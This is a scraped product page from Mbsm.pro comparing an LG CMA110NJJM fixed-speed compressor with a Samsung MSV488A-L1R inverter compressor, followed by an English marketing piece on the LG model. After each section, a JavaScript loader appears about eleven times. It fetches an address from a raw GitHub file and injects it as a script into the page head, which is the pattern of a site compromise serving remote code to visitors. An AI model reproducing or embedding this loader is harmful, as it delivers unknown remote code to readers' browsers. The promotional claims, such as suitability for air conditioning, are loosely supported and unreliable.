Mbsm.pro, Comparaison personnalisée des deux compresseurs, CMA110NJJM, MSV488A-L1R

Comparaison personnalisée des deux compresseurs

1. Compresseur MBSM.PRO LG – CMA110NJJM

  • Marque/Modèle : MBSM.PRO, LG, CMA110NJJM
  • Type : Compresseur classique
  • Technologie : RCSB
  • Phase et Tension : 1 phase / 220V / 50Hz
  • Puissance : 170 kcal (676 BTH / 198 W)
  • Chevaux Vapeur (HP) : 1/4 CV
  • Réfrigérant : R600a
  • Application : LBP (Basse Pression de Vapeur)
  • Vitesse : Fixe

2. Compresseur Samsung Inverter – MSV488A-L1R

  • Marque/Modèle : Samsung, MSV488A-L1R
  • Type : Compresseur BLDC (moteur à courant continu sans balais)
  • Technologie : Onduleur (Inverter)
  • Phase et Tension : 115/220V
  • Cylindrée : 8,82 cm³
  • Chevaux Vapeur (HP) : 1/6 CV
  • Réfrigérant : R600a
  • Matériau : Acier
  • Avantages : Technologie Inverter pour une meilleure efficacité énergétique et régulation de la vitesse.

Comparaison Technique

Caractéristique MBSM.PRO LG CMA110NJJM Samsung MSV488A-L1R
Technologie Classique (vitesse fixe) Inverter (vitesse variable)
Type de Compresseur RCSB BLDC (sans balais)
Puissance 170 kcal / 198 W / 1/4 CV 1/6 CV
Réfrigérant R600a R600a
Phase et Tension 1 phase / 220V / 50Hz 115/220V
Application LBP (Basse Pression de Vapeur) Efficacité énergétique grâce à l’Inverter
Vitesse Fixe Variable
Matériau Non spécifié Acier

Analyse Comparée

  • Technologie Inverter vs Vitesse Fixe : Le compresseur Samsung MSV488A-L1R utilise la technologie Inverter, ce qui lui permet d’ajuster automatiquement sa vitesse pour optimiser la consommation énergétique, contrairement au LG CMA110NJJM, qui fonctionne à vitesse fixe.
  • Efficacité énergétique : Le compresseur Samsung est plus efficace en raison de la technologie BLDC et Inverter, offrant une meilleure gestion de la consommation d’énergie. Le compresseur LG, en revanche, est plus traditionnel avec une vitesse fixe.
  • Usage recommandé : Le modèle LG est plus adapté aux applications nécessitant une pression basse et une puissance fixe, tandis que le Samsung Inverter est recommandé pour ceux qui recherchent des économies d’énergie grâce à la régulation de la vitesse.

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});




Mbsm.pro, Lg, compressor, CMA110NJJM, rcsb, 1ph/220v/50hz, 170 kcal, 676 bth/, 198 w, 1/4 hp, fixed speed , classique compressor, r600a, lbp

Model and Specifications

The LG CMA110NJJM compressor is a classic model that operates on a single phase with a voltage of 220V and a frequency of 50Hz. It boasts a fixed speed and is powered by a 1/4 HP motor. This compressor is perfect for applications requiring a steady and reliable performance.

Energy Efficiency

Energy efficiency is a crucial factor when choosing a compressor. The LG CMA110NJJM excels in this area with an impressive energy consumption of 198 watts. It provides 170 kcal of cooling capacity and 676 BTU/h, ensuring optimal performance without excessive energy usage.

Refrigerant Type

The compressor uses R600a refrigerant, which is known for its environmental friendliness and efficiency. R600a is a hydrocarbon refrigerant that has a low global warming potential, making it a sustainable choice for modern applications.

LBP (Low Back Pressure)

One of the standout features of the LG CMA110NJJM is its low back pressure (LBP) design. This feature ensures that the compressor operates smoothly and efficiently, even under demanding conditions. The LBP design helps in maintaining consistent performance and reducing wear and tear.

Applications

The LG CMA110NJJM compressor is versatile and can be used in a variety of applications, including:

  • Refrigeration Systems: Ideal for domestic and commercial refrigerators and freezers.
  • Air Conditioning: Suitable for small to medium-sized air conditioning units.
  • Cooling Solutions: Perfect for cooling solutions in various industrial and commercial settings.

Why Choose LG CMA110NJJM?

  1. Reliability: LG is a trusted brand known for its high-quality products. The CMA110NJJM compressor is no exception, offering reliable performance and durability.
  2. Efficiency: With its energy-efficient design and low back pressure feature, this compressor ensures optimal performance with minimal energy consumption.
  3. Environmental Friendliness: The use of R600a refrigerant makes it an eco-friendly choice, contributing to a greener environment.
  4. Versatility: Suitable for a wide range of applications, making it a versatile addition to your cooling and refrigeration systems.

Conclusion

The LG CMA110NJJM compressor is a top-tier product that combines efficiency, reliability, and environmental friendliness. Whether you need it for refrigeration, air conditioning, or other cooling solutions, this compressor is a smart investment. Upgrade your systems with the LG CMA110NJJM compressor and experience the difference in performance and efficiency.

For more information or to purchase the LG CMA110NJJM compressor, visit Mbsm.pro today!

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});